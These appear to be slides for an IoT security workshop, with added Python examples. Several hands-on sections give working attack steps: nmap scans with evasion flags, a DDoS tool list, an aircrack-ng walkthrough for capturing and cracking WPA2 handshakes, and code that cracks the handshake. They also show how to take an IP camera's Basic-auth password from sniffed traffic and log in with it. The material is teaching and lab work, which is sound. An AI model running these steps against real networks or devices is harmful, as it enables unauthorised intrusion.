Prepared by:
Jing Hui, Ivan, Syuqri and Claudia
Acknowledgement
IMPORTANT
iTrust acknowledges that any and all software and/or tools presented in this
workshop are the sole property of their respective trademark / registered /
copyright owners.
Warning!
Please do not use the tools provided for unethical purposes.
Agenda
9.00 – 9.30am  Introduction to iTrust and the Internet of Things (IoT)
9.30 – 10.30am  Introduction to Networking
10.30 – 10.45am  Break
10.45am – 12.30pm  Ethical Hacking and Cyber Security
12.30 – 1.30pm  Lunch
1.30 – 3.30pm  Compromising IoT Devices 1
3.30 – 3.45pm  Break
3.45 – 4.45pm  Compromising IoT Devices 2
4.45 – 4.55pm  Closing
4.55 – 5.25pm  Tour of iTrust labs
5.25 – 5.30pm  Workshop evaluation
Who are we?
(Slide diagram: funding; focus areas: CPS, enterprise security, IoT; distinctive values; collaborators)
Section 1
Before We Start….
Cyber Security Considerations
Infrastructure (e.g. banking, energy, water, transport)
Company (e.g. wireless vulnerability, secured networks)
Personal (e.g. data privacy, cybercrime)
Introduction to IoT
• What is IoT?
The Internet of Things (IoT) is the network of physical devices, vehicles, buildings and other items embedded with electronics, software, sensors, actuators and network connectivity that enable these objects to collect and exchange data.
Compromised IoT devices
IoT - Problems
• Every connected device is an additional attack vector for an attacker to compromise.
• Because IoT is relatively new, there are no established methods or standards for securing such devices.
• When talking about IoT security, should we be concerned about privacy issues as well?
Section 2
Networks
http://25ffhnaechrbzwf3.onion/
Network – LAN / WAN
Network – IP / MAC Address
How the internet works
OSI 7 Layers
Types of Protocol
What is Wireless?
• Wireless networking is a method by which homes, telecommunications networks and enterprise (business) installations avoid the costly process of running cables into a building, or between various equipment locations.
Types of wireless transmission
There are 3 different ranges for wireless transmission
Short-range
• Infrared
• Bluetooth
Medium-range
• 802.11a/b/g/n/ac (Wi-Fi)
Long-range
• Worldwide Interoperability for Microwave Access (WiMAX)
• Global System for Mobile Communications (GSM)
Wireshark
• Wireshark is a network packet/protocol analyzer.
• A packet analyzer captures network packets and displays the captured packet data in as much detail as possible, decoding each protocol layer.
Exercise 1 – Wireshark
1. Observe network traffic
2. Find the TCP 3-way handshake
3. Dissect the Skype pcap file to see what information can be found
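The 3-way handshake you are asked to find in step 2 is SYN, SYN-ACK, ACK with linked sequence numbers. The following Python example is added here and is not part of the workshop material: it decodes raw TCP headers (the same fields Wireshark shows) and pairs the three segments by sequence and acknowledgement number, so that a stray ACK is not mistaken for the end of a handshake. The capture it runs on is constructed inline; the Skype pcap is not included.

```python
import struct

# TCP flag bits (RFC 9293).
FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def build_tcp_header(sport, dport, seq, ack, flags, window=65535):
    """Build a minimal 20-byte TCP header (no options, checksum left at 0).
    Only used to construct the sample packets below; a real capture comes from pcap."""
    offset_flags = (5 << 12) | flags          # data offset = 5 x 32-bit words
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack, offset_flags, window, 0, 0)


def parse_tcp_header(data):
    """Decode the fixed 20-byte part of a TCP header into a dict."""
    sport, dport, seq, ack, offset_flags, window, _csum, _urg = struct.unpack("!HHIIHHHH", data[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": offset_flags & 0x1FF, "header_len": (offset_flags >> 12) * 4}


def find_handshakes(packets):
    """Return [(client, server), ...] for every complete SYN / SYN-ACK / ACK
    exchange in `packets`, a list of (src_ip, dst_ip, tcp_header_bytes) in
    capture order. Each endpoint is an (ip, port) tuple. Sequence numbers are
    checked: the SYN-ACK must acknowledge ISN_client+1 and the final ACK must
    acknowledge ISN_server+1, so an unrelated ACK does not complete a handshake."""
    pending = {}                              # (client, server) -> partial state
    completed = []
    for src, dst, raw in packets:
        h = parse_tcp_header(raw)
        flags = h["flags"]
        me, peer = (src, h["sport"]), (dst, h["dport"])
        if flags & SYN and not flags & ACK:                     # 1. SYN
            pending[(me, peer)] = {"isn_c": h["seq"], "stage": 1}
        elif flags & SYN and flags & ACK:                       # 2. SYN-ACK (server -> client)
            st = pending.get((peer, me))
            if st and st["stage"] == 1 and h["ack"] == (st["isn_c"] + 1) & 0xFFFFFFFF:
                st.update(isn_s=h["seq"], stage=2)
        elif flags & ACK and not flags & (SYN | RST):           # 3. ACK
            st = pending.get((me, peer))
            if st and st["stage"] == 2 and h["ack"] == (st["isn_s"] + 1) & 0xFFFFFFFF:
                completed.append((me, peer))
                del pending[(me, peer)]
    return completed


# Constructed sample capture (not a real pcap): one complete handshake to port 80,
# followed by a second attempt whose final ACK carries the wrong acknowledgement
# number and therefore must not be reported.
SAMPLE_CAPTURE = [
    ("10.0.0.5", "10.0.0.9", build_tcp_header(51000, 80, 1000, 0, SYN)),
    ("10.0.0.9", "10.0.0.5", build_tcp_header(80, 51000, 5000, 1001, SYN | ACK)),
    ("10.0.0.5", "10.0.0.9", build_tcp_header(51000, 80, 1001, 5001, ACK)),
    ("10.0.0.5", "10.0.0.9", build_tcp_header(51001, 80, 2000, 0, SYN)),
    ("10.0.0.9", "10.0.0.5", build_tcp_header(80, 51001, 7000, 2001, SYN | ACK)),
    ("10.0.0.5", "10.0.0.9", build_tcp_header(51001, 80, 2001, 9999, ACK)),
]

if __name__ == "__main__":
    for client, server in find_handshakes(SAMPLE_CAPTURE):
        print(f"handshake: {client[0]}:{client[1]} -> {server[0]}:{server[1]}")
```

In Wireshark the same three segments are the ones matched by the display filter tcp.flags.syn==1 || (tcp.flags.ack==1 && tcp.len==0) at the start of a stream; the sequence-number check above is what distinguishes a genuine handshake from an ACK of existing data.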
Summary
• What is a LAN/WAN ?
• Components of a network
• How does the internet function ?
• Wireless communication and monitoring
• Wireshark
Section 3
Introduction To Ethical Hacking
Hacking Phases
Cyber Kill Chain
Objectives of Reconnaissance
Types of Scanning
Scanning – nmap (Hands-on)
• Nmap (nmap.org)
• With admin/root privilege, host discovery uses an ICMP echo (ping sweep), an ARP ping on the local segment, an ICMP timestamp request and TCP probes to ports 80 and 443
• Without admin/root privilege, only TCP probes (a connect to ports 80 and 443) are possible
• -sn : host discovery only, skip port scanning
• -PE : use an ICMP echo request as the discovery probe
• --send-ip : send IP-level probes instead of the ARP ping that nmap otherwise defaults to for targets on the same segment (takes no argument)
• e.g. : nmap -sn -PE --send-ip x.x.x.x
Caution : even a ping sweep is visible to IDS monitoring (e.g. Snort – snort.org)
Scanning – nmap (Hands-on)
• Nmap (nmap.org)
• Port scan without host discovery, e.g. nmap -Pn -sS -p 22 --open x.x.x.x/24
• -Pn : skip host discovery and treat every address as up (without -p, nmap would scan its default 1,000 most common ports)
• -sS -p 22 --open : TCP SYN scan of port 22, output only hosts that have it open
• x.x.x.x/24 : the network segment to scan
Caution : scanning large numbers of ports and hosts is noisy (easily detected) and can disrupt fragile embedded/IoT devices
Scanning – nmap (Hands-on)
• Nmap (nmap.org)
• -oN : normal (human-readable) output file
• -oG : greppable output file (one line per host)
• -oX : XML output file
• -oA : all three formats at once
• -f : fragment the probe packets (to slip past simple stateless packet filters/IDS)
• -D : decoy addresses (decoys should be alive, otherwise the scan can accidentally SYN-flood the target)
• e.g.
• nmap -sF x.x.x.x/24 -oN outputfile  (-sF : FIN scan, a probe without SYN that some stateless filters pass)
• nmap -sS x.x.x.x -D y.y.y.y
Caution : Sophisticated/modern packet-filtering devices and application-based firewalls queue and reassemble all IP fragments before inspection, so -f does not evade them
Denial of Service (DOS) Attack
Symptoms of a DOS Attack
• Unavailability of a website
• Inability to access any website
• Unusually slow network performance
• Dramatic increase in e-mail spam
Type of DOS / DDOS
Volume Based Attacks
Includes UDP floods, ICMP floods, and other spoofed-packet floods. The attack's goal is to saturate the bandwidth of the attacked site, and magnitude is measured in bits per second (bps).
Protocol Attacks
Includes SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. This type of attack consumes actual server resources, or those of intermediate communication equipment such as firewalls and load balancers, and is measured in packets per second (pps).
Application Layer Attacks
Includes Slowloris, zero-day DDoS attacks, DDoS attacks that target Apache, Windows or OpenBSD vulnerabilities, and more. Comprised of seemingly legitimate and innocent requests, the goal of these attacks is to exhaust or crash the web server, and the magnitude is measured in requests per second (rps).
DDOS Attack (Case Study)
DDOS Attack Tools
• LOIC - Low Orbit Ion Canon (sourceforge.net/projects/loic/)
• XOIC (sourceforge.net/projects/xoic/)
• HULK - HTTP Unbearable Load King (packetstormsecurity.com/files/112856/HULK-Http-UnbearableLoad-King.html)
• DDOSIM - Layer 7 DDOS Simulator (sourceforge.net/projects/ddosim/)
• R-U-Dead-Yet (code.google.com/p/r-u-dead-yet/)
• TOR’s Hammer (packetstormsecurity.com/files/98831/)
DDOS Hands-On
LOIC - Low Orbit Ion Canon
Understanding Malware
Virus. A computer virus attaches itself to a program or file so that it spreads from one computer to another, leaving infections as it travels; it needs a human action (running the infected program) to spread.
Worm. Often classed as a sub-class of virus, but it spreads without any human action: a worm takes advantage of file or information transport features on your system (network shares, e-mail, vulnerable services), which is what allows it to travel unaided.
Trojan. Malicious code disguised as something useful. It can cause serious damage by deleting files and destroying information on your system, or create a backdoor that gives malicious users access to your system, possibly allowing confidential or personal information to be compromised. It does not reproduce or self-replicate.
Blended threat. A more sophisticated attack that bundles some of the worst aspects of viruses, worms, Trojan horses and other malicious code into one single threat; this is the territory of the APT.
Advanced Persistent Threat (APT)
• An advanced persistent threat (APT) is a network attack in which an unauthorized person gains access to a network and stays there undetected for a long period of time. The intention of an APT attack is to steal data rather than to cause damage to the network or organization. APT attacks target organizations in sectors with high-value information, such as national defense, manufacturing and the financial industry.
Data Exfiltration Using Advanced Techniques
https://www.youtube.com/watch?v=RChj7Mg3rC4
Summary
• Cyber kill chain
• Nmap
• What is a botnet, DDoS ?
• Malware classification
• APTs and how do they steal data from an organization
Section 4
Introduction To Cyber Security
Encryption
• What is encryption?
Caesar’s Cipher
• Each letter is replaced by a letter some fixed number of positions
down the alphabet.
Encryption
• Take for example the encryption algorithm AES, which allows keys of up to 256 bits.
• The size of the key space is counted as
Number of keys = 2^x
where x is the number of key bits.
• For example, a 2048-bit number (the size of an RSA-2048 modulus) has 2^2048 possible values, which in decimal is approximately 3.2317 × 10^616.
• Caveat: an RSA key is not an arbitrary 2048-bit string and nobody attacks RSA by enumerating moduli; its strength rests on the difficulty of factoring the modulus, and RSA-2048 is rated roughly equivalent to a 112-bit symmetric key (NIST SP 800-57).
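Caesar's cipher and the key-space formula above, as an added Python example that is not from the workshop slides: a Caesar cipher has only 26 keys and is broken by trying all of them, while key_space(256) shows why exhaustive search of an AES-256 key is not an option. The crib words used to recognise the recovered plaintext are an assumption of the example.

```python
import string

ALPHABET = string.ascii_uppercase


def caesar(text, shift):
    """Replace each letter by the letter `shift` positions down the alphabet
    (wrapping round); non-letters pass through. Decrypt with a negative shift."""
    out = []
    for ch in text.upper():
        out.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26] if ch in ALPHABET else ch)
    return "".join(out)


def brute_force_caesar(ciphertext, crib_words=("THE", "AND", "ATTACK")):
    """Exhaustive key search: try all 25 non-trivial shifts and return
    (shift, plaintext) for the first candidate containing a crib word
    (the crib list is an assumption of this example). The key space is so
    small that the attacker never needs to be given the key."""
    for shift in range(1, 26):
        candidate = caesar(ciphertext, -shift)
        if any(word in candidate for word in crib_words):
            return shift, candidate
    return None


def key_space(bits):
    """Number of possible keys for a `bits`-bit key: 2**bits."""
    return 2 ** bits


def decimal_digits(n):
    """How many decimal digits a key space has (2**2048 has 617)."""
    return len(str(n))


if __name__ == "__main__":
    c = caesar("ATTACK AT DAWN", 3)
    print(c, "->", brute_force_caesar(c))
    print("Caesar keys:", len(ALPHABET), " AES-256 keys:", key_space(256))
    print("2**2048 has", decimal_digits(key_space(2048)), "decimal digits")
```

At a billion guesses per second the Caesar search finishes in nanoseconds; the same attacker would need far longer than the age of the universe for 2^128 keys, which is why key length, not algorithm secrecy, is what the slides' formula is measuring.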
Symmetric Encryption
• All algorithms of the symmetric variety use a SINGLE key to encrypt and decrypt information.
• In traditional cryptographic systems, the same key is used by the sender and receiver to both encrypt and decrypt the message, so the key itself must first be shared over a secure channel.
• Some of the more common algorithms are 3DES, AES and Blowfish.
Asymmetric Encryption
RSA Algorithm
In RSA, this asymmetry is based on the practical difficulty of factoring the product of two large prime numbers.
Key Signing Exercise
• https://www.cs.drexel.edu/~introcs/Fa11/notes/10.1_Cryptography/RSAWorksheetv4d.html - asymmetric
• https://encipher.it/ - symmetric
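A worked RSA example in Python, added here as an illustration of the RSA slide and the key-signing exercise; it is not the worksheet's own code. The primes p = 61 and q = 53 are assumed toy values (a real key uses primes of about 1024 bits each). The block shows key generation, encryption, decryption, signing and verification, plus the trial-division factoring attack that is instant at this size and infeasible at 2048 bits.

```python
from math import gcd


def generate_keypair(p, q, e=17):
    """Toy RSA key generation from two primes p and q (assumed tiny here).
    Returns ((e, n), (d, n)) = (public key, private key)."""
    n = p * q
    phi = (p - 1) * (q - 1)               # Euler's totient for n = p*q
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)                   # modular inverse (Python 3.8+)
    return (e, n), (d, n)


def rsa_encrypt(m, public_key):
    """c = m^e mod n; anyone holding the public key can do this."""
    e, n = public_key
    return pow(m, e, n)


def rsa_decrypt(c, private_key):
    """m = c^d mod n; only the private-key holder can do this."""
    d, n = private_key
    return pow(c, d, n)


def rsa_sign(m, private_key):
    """A signature is the private-key operation applied to the message (hash)."""
    d, n = private_key
    return pow(m, d, n)


def rsa_verify(m, signature, public_key):
    """Verification is the public-key operation; it must give back m."""
    e, n = public_key
    return pow(signature, e, n) == m


def factor_modulus(n):
    """Trial division: recovers p and q instantly for n = 3233, after which the
    attacker can compute d. For a 2048-bit n this loop never finishes; that gap
    is the asymmetry RSA relies on."""
    for p in range(2, int(n ** 0.5) + 1):
        if n % p == 0:
            return p, n // p
    return None


if __name__ == "__main__":
    public, private = generate_keypair(61, 53)
    c = rsa_encrypt(65, public)
    print("public", public, "private", private, "ciphertext", c, "decrypted", rsa_decrypt(c, private))
    print("factored:", factor_modulus(public[1]))
```

This is textbook RSA on raw integers; real implementations pad the message (OAEP for encryption, PSS for signatures) and sign a hash of the data rather than the data itself, otherwise the scheme is malleable.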
Hashing
• Difference between encryption and hashing?
Password Cracker
Hands-on
Hash Generator
Salting
• In cryptography, a salt is random data that is used as an additional input to a one-way function that hashes a password or passphrase. The primary function of salts is to defend against dictionary attacks against a list of password hashes and against pre-computed rainbow table attacks, because the same password no longer produces the same hash for every user.
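Hashing, password cracking and salting shown in one added Python example (it is not the workshop's hash-generator exercise): a precomputed table cracks an unsalted SHA-256 password hash with a single lookup, while a per-user random salt forces the attacker to redo the dictionary attack for every hash. The five-entry wordlist is constructed for the example; SHA-256 is used to stay close to the slides, whereas a real system uses a slow password hash (bcrypt, scrypt, Argon2 or PBKDF2 with a high iteration count).

```python
import hashlib
import os

# Constructed wordlist for the example (a real one has millions of entries).
WORDLIST = ["123456", "password", "iloveyou", "letmein", "qwerty"]


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def build_lookup_table(wordlist):
    """Precomputed hash -> password table. Because an unsalted hash of a given
    password is always the same, one table cracks every victim's hash at once."""
    return {sha256_hex(word.encode()): word for word in wordlist}


def crack_unsalted(target_hash, table):
    """One dictionary lookup; no hashing needed at attack time."""
    return table.get(target_hash)


def hash_password(password, salt=None):
    """Salted hash: a fresh random salt per user, stored beside the hash.
    Returns (salt, hex_digest)."""
    if salt is None:
        salt = os.urandom(16)
    return salt, sha256_hex(salt + password.encode())


def verify_password(password, salt, stored_hash):
    """Login check: recompute with the stored salt and compare."""
    return hash_password(password, salt)[1] == stored_hash


def crack_salted(salt, target_hash, wordlist):
    """The attacker must hash each candidate with THIS user's salt; the
    precomputed table is useless and the work repeats for every user."""
    for word in wordlist:
        if sha256_hex(salt + word.encode()) == target_hash:
            return word
    return None


def same_password_same_hash(password):
    """(unsalted, salted): whether two users with the same password get the
    same stored hash. True for unsalted (linkable across users), False with salts."""
    unsalted = sha256_hex(password.encode()) == sha256_hex(password.encode())
    salted = hash_password(password)[1] == hash_password(password)[1]
    return unsalted, salted


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    leaked = sha256_hex(b"iloveyou")                       # unsalted hash from a breach
    print("unsalted:", crack_unsalted(leaked, table))
    salt, h = hash_password("iloveyou")
    print("table vs salted:", crack_unsalted(h, table), " dictionary vs salted:", crack_salted(salt, h, WORDLIST))
```

Note that the salt does not have to be secret; it only has to be unique per hash. A weak password in the wordlist still falls to crack_salted, which is why the slow hash functions named above matter as much as the salt.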
In Conclusion
IS ENCRYPTION ENOUGH?!
Reuters reported in December 2013 that the NSA had paid RSA $10 million to make a now-discredited cryptography system the default in software used by a wide range of Internet and computer security programs. The system, called Dual Elliptic Curve (Dual_EC_DRBG), was a random number generator, but it had a deliberate flaw - or "back door" - that allowed the NSA to predict its output and so break the encryption built on it.
Summary
• Encryption, symmetric and asymmetric
• Hashing
• Difference between encryption and hashing
• Brute-force attacks, dictionary attacks and pass-the-hash
Section 5
The Internet of Not Really Secure Things
Top 10 vulnerabilities for IoT
Communications in IoT
Wi-Fi Recap
• 802.11 standard
• Medium-range communication (see the wireless transmission ranges above)
• Now, let's discuss its security…
Security concerns for Wi-Fi
• WEP – RC4 with weak IV handling; the key is recoverable from captured traffic in minutes, never use it
• WPA – TKIP stop-gap for WEP-era hardware; PSK mode is open to dictionary attacks on the handshake
• WPA2 – AES-CCMP; strong, but WPA2-PSK still falls to a dictionary attack if the passphrase is weak (the exercise below)
Bluetooth
• Short-wavelength UHF radio in the ISM band from 2.4 to 2.485 GHz
• A master communicates with a maximum of seven active slave devices in a piconet (an ad-hoc network using Bluetooth technology)
• Key pairing mechanisms
Security concerns for Bluetooth
• Prior to Bluetooth v2.1, encryption is not required and can be turned off at any time
• The legacy PIN-based key pairing mechanism can be sniffed and the link key recovered easily
IP Camera Exercise
Objectives
• Get access into the network
• Identify the IP camera that has been assigned (via MAC address)
• Identify traffic that is essential for getting access to IP camera’s
stream
What is a MAC address?
• Media access control address, also called a physical address
• Unique identifier assigned to a network interface for communication on the physical network segment
• OUI – Organizationally Unique Identifier: the first three octets
• Purchased by a vendor/manufacturer and assigned by the Institute of Electrical and Electronics Engineers (IEEE), so the OUI tells you who made the device
00:1B:2F:BB:4C:98  (OUI = 00:1B:2F; the remaining three octets are assigned by the vendor)
Cracking Wi-Fi password
Step 0
• Type ifconfig to find the wireless interface name, i.e. wlan*
• Navigate to the appropriate directory in the terminal
• cd Desktop > cd Scy\ Phy/ > cd Wi\ Fi/
• This will navigate into the Scy Phy > Wi Fi folder
Step 1 – Starting monitor mode
• You are required to sniff the wireless traffic to determine which network you want to gain access to.
• For wireless networks, we will be using a suite of tools called Aircrack-ng.
• To go into monitor mode, use the command 'sudo airmon-ng start XXX' where XXX is the interface you would like to use. airmon-ng creates a monitor-mode interface (e.g. wlan0mon); use that name in the following steps.
Step 2 – Identify MAC address of AP
• Use the airodump-ng command in the terminal
• Command: sudo airodump-ng <interface name>
• This will show you a list of available access points and their respective MAC addresses
• Do take note of the MAC address of the target access point (AndroidAP)
Step 3 – Capturing packets using airodump
• Firstly, navigate to a folder of choice to store the captured packets
• Example: cd Desktop
• Use the airodump-ng command in the terminal as follows
• sudo airodump-ng -c <channel> --bssid <MAC address of AP> -w <name of output file> <interface name>
• This will start a capture of packets on the access point
Step 4 – Deauthentication using aireplay
• This will prompt a reconnection of a target device to the network
• Why do we want to do this? Because the WPA2 four-way handshake is only sent when a client (re)connects, and that handshake is what we need to capture for offline cracking
• Use the command as follows
• sudo aireplay-ng -0 1 -c <MAC of target device> -a <MAC of AP> -e <Access point name> <interface name> --ignore-negative-one
• -0 1 : send one round of deauthentication frames; -c : the client; -a : the AP's BSSID
• This will deauthenticate the target device and make it reconnect to the access point.
Step 5 – Capturing the four-way handshake
• Do the deauthentication attack multiple times to ensure that a four-way handshake is captured
• airodump-ng (still running from Step 3) shows "WPA handshake: <MAC of AP>" in its top line once it has one
Step 6 – Cracking password using aircrack
• This will be done using a dictionary attack
• Do you remember what a dictionary attack is?
• Use the command as follows
• sudo aircrack-ng -w <password list file> -b <MAC of access point> <name of .cap file you have saved>
• If the cracking is successful, the password is shown in the terminal window as "KEY FOUND!"; it can only succeed if the passphrase is in the wordlist
• Congratulations on cracking the password!
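What aircrack-ng does in Step 6, and why Steps 4 and 5 are needed, as an added Python example that is not part of the workshop material: each candidate passphrase is run through PBKDF2 to get the PMK; the PMK plus the two MAC addresses and two nonces from the captured four-way handshake gives the PTK; and the KCK part of the PTK must reproduce the MIC on the captured EAPOL frame. Without the handshake there is nothing to test candidates against. The handshake fields below (SSID, MACs, nonces, EAPOL bytes) are constructed for the example from an assumed passphrase, so the cracking code has a genuine MIC to verify; the PMK vector in the test is the published IEEE 802.11 one.

```python
import hashlib
import hmac


def wpa2_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the expensive step aircrack-ng repeats for every wordlist entry."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def wpa2_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """PTK from the PMK and the four public handshake values, ordered as the standard requires."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """WPA2/CCMP key MIC: HMAC-SHA1 keyed with the KCK (PTK bytes 0..15), truncated to 16 bytes.
    The MIC is computed over the EAPOL-Key frame with its MIC field set to zeros."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, client_mac, anonce, snonce, eapol_zeroed, captured_mic, wordlist):
    """Dictionary attack: return the first candidate whose derived KCK reproduces the captured MIC."""
    for candidate in wordlist:
        pmk = wpa2_pmk(candidate, ssid)
        kck = wpa2_ptk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic):
            return candidate
    return None


# Constructed handshake (assumed values, not a real capture). In a real attack these
# come from the .cap file written by airodump-ng; here the MIC is generated from the
# assumed passphrase "sunshine123" so the cracking logic has something genuine to verify.
SSID = "AndroidAP"
AP_MAC = bytes.fromhex("020000aabbcc")          # assumed locally administered addresses
CLIENT_MAC = bytes.fromhex("020000ddeeff")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_ZEROED = bytes.fromhex("0103007502010a00") + bytes(113)   # EAPOL-Key msg 2 with MIC field zeroed
CAPTURED_MIC = eapol_mic(wpa2_ptk(wpa2_pmk("sunshine123", SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16], EAPOL_ZEROED)
WORDLIST = ["password", "123456", "iloveyou", "sunshine123", "letmein"]

if __name__ == "__main__":
    print("KEY FOUND:", crack_handshake(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, EAPOL_ZEROED, CAPTURED_MIC, WORDLIST))
```

The 4096-round PBKDF2 is the only part that costs anything, and it is keyed by the SSID, which is why a rainbow table for one network name is useless against another and why a long random passphrase (rather than a different SSID) is the actual defence.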
Hacking IP Camera
Step 1 – Nmap scan on network
• Use Nmap to do a quick scan on the network
• nmap -T4 -F 192.168.0.0/24  (-T4 : aggressive timing; -F : fast scan of the 100 most common ports)
• Identify the target MAC address
• B0:C5:54:xx:xx:xx
• Take note of the ports and services as well
Sample Nmap quick scan output
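The quick scan's output is where the camera's MAC, OUI and service ports come from. The following Python example is added here (it is not workshop code) to parse nmap's normal on-screen / -oN output for a whole /24 and pick out the host whose OUI matches. The scan text it parses is constructed to look like nmap output for the exercise network: the B0:C5:54 OUI is assumed to be the camera's as on the slide, and the other addresses are invented.

```python
import re

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17})(?: \((.*)\))?")

# Constructed sample, laid out like the output of `nmap -T4 -F 192.168.0.0/24`.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.0.1
Host is up (0.0010s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE
53/tcp open  domain
80/tcp open  http
MAC Address: 02:00:00:AA:BB:CC (Unknown)

Nmap scan report for 192.168.0.23
Host is up (0.0042s latency).
Not shown: 97 closed ports
PORT     STATE SERVICE
80/tcp   open  http
554/tcp  open  rtsp
8080/tcp open  http-proxy
MAC Address: B0:C5:54:11:22:33 (Unknown)

Nmap scan report for 192.168.0.40
Host is up (0.0030s latency).
All 100 scanned ports on 192.168.0.40 are closed
MAC Address: 02:00:00:DD:EE:FF (Unknown)

Nmap done: 256 IP addresses (3 hosts up) scanned in 4.21 seconds
"""


def parse_nmap_normal(text):
    """Parse nmap normal output into a list of host dicts:
    {"ip", "mac", "vendor", "ports": [(port, proto, state, service), ...]}.
    MAC lines only appear when scanning the local segment as root."""
    hosts, current = [], None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = {"ip": m.group(1), "mac": None, "vendor": None, "ports": []}
            hosts.append(current)
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            current["ports"].append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
            continue
        m = MAC_RE.match(line)
        if m:
            current["mac"] = m.group(1).upper()
            current["vendor"] = m.group(2)
    return hosts


def oui(mac):
    """The OUI is the first three octets of the MAC address."""
    return mac.upper()[:8]


def hosts_with_oui(hosts, prefix):
    """Hosts whose interface was made by the vendor owning `prefix`."""
    return [h for h in hosts if h["mac"] and oui(h["mac"]) == prefix.upper()]


def open_services(host):
    """service name -> port for every open port on the host."""
    return {service: port for port, _proto, state, service in host["ports"] if state == "open"}


if __name__ == "__main__":
    for cam in hosts_with_oui(parse_nmap_normal(SAMPLE_SCAN), "B0:C5:54"):
        print(cam["ip"], cam["mac"], open_services(cam))
```

Nmap resolves the vendor name itself from its nmap-mac-prefixes file; when it prints (Unknown), looking the OUI up in the IEEE registry by hand is the fallback.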
What is RTSP?
• Real Time Streaming Protocol (RTSP)
• Network control protocol designed for use in entertainment and
communications systems to control streaming media servers
• The protocol is used for establishing and controlling media sessions
between end points.
Step 2 – Sniffing traffic using Wireshark
• Use Wireshark to sniff traffic
• Filter traffic based on IP address
• ip.addr == 192.168.0.xxx
• Get useful information from traffic
• Hint: Remember Nmap ports and services?
Sample Wireshark capture
Step 3 – Understanding the HTTP stream
• In the stream (Follow TCP Stream), you should notice a header called "Authorization: Basic ……"
• HTTP Basic authentication (BA) is the simplest technique for enforcing access controls to web resources because it doesn't require cookies, session identifiers or login pages; it uses standard fields in the HTTP header, obviating the need for handshakes.
• The string after "Basic" is user:password encoded in Base64. Base64 is an encoding, not encryption: anyone who can see the traffic can decode it, which is why Basic authentication is only safe over HTTPS.
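Decoding the header you find in Step 3, as an added Python example rather than workshop code: it walks a captured HTTP request, finds the Authorization header and recovers the user name and password, and also shows what a browser sends once you type credentials into the login popup of Step 3 (continued). The request text and the admin/admin123 credentials in it are constructed for the example, not taken from any real device.

```python
import base64

# Constructed request, in the shape Wireshark's Follow TCP Stream shows (not a real capture).
CAPTURED_REQUEST = (
    "GET /cgi-bin/settings HTTP/1.1\r\n"
    "Host: 192.168.0.23\r\n"
    "Authorization: Basic YWRtaW46YWRtaW4xMjM=\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)


def extract_basic_credentials(http_request):
    """Find the Authorization: Basic header and decode it to (user, password).
    Returns None if the request carries no Basic credentials. Base64 is an
    encoding, not encryption: anyone on the path recovers the clear text."""
    head = http_request.split("\r\n\r\n", 1)[0]          # headers only, never the body
    for line in head.split("\r\n")[1:]:                  # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "authorization":
            scheme, _, token = value.strip().partition(" ")
            if scheme.lower() != "basic":
                return None
            decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
            user, _, password = decoded.partition(":")   # a password may itself contain ':'
            return user, password
    return None


def make_basic_header(user, password):
    """What a browser sends after you type the credentials into the login popup."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Authorization: Basic {token}"


if __name__ == "__main__":
    print(extract_basic_credentials(CAPTURED_REQUEST))
    print(make_basic_header("admin", "admin123"))
```

The same header is resent on every request for the rest of the session, so a single captured request is enough; the only fix on the camera's side is to serve the interface over TLS (or to use a session cookie issued after a challenge), not to "hide" the string better.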
Step 3 (continued) – Accessing the camera's settings
• Input the camera's IP address into a web browser
• Example - 192.168.0.xxx
• This should prompt a login popup
• Verify that the prior steps worked by keying in the login details recovered from the capture
Step 4 – Figuring out what else we can do
• Remember the results of the Nmap scan?
• What other protocols or services are there (e.g. RTSP on port 554 for the video stream)?
Discussion
• Defence techniques ?
• How can one mitigate the attacks we just performed ?
Password Guidelines
• The longer the password, the harder it is to crack
• Use a combination of letters, numbers and special characters
• Use a different password for each account
What to avoid while selecting your password
• dictionary words
• easy-to-guess names and numbers
• sequences or repeated characters
• entries on the worst-password lists (password, 123456, 111111, iloveyou, etc.)
• Question: Longer or more complex, which is better?
Fitbit
• Used to use an unencrypted communication channel
• Synchronizes automatically with the mobile device over BLE
• So what does all this translate to for an attacker?
Fitbit exercise
• Convert the fitbit.psd capture to a pcap using tibtle2pcap.py
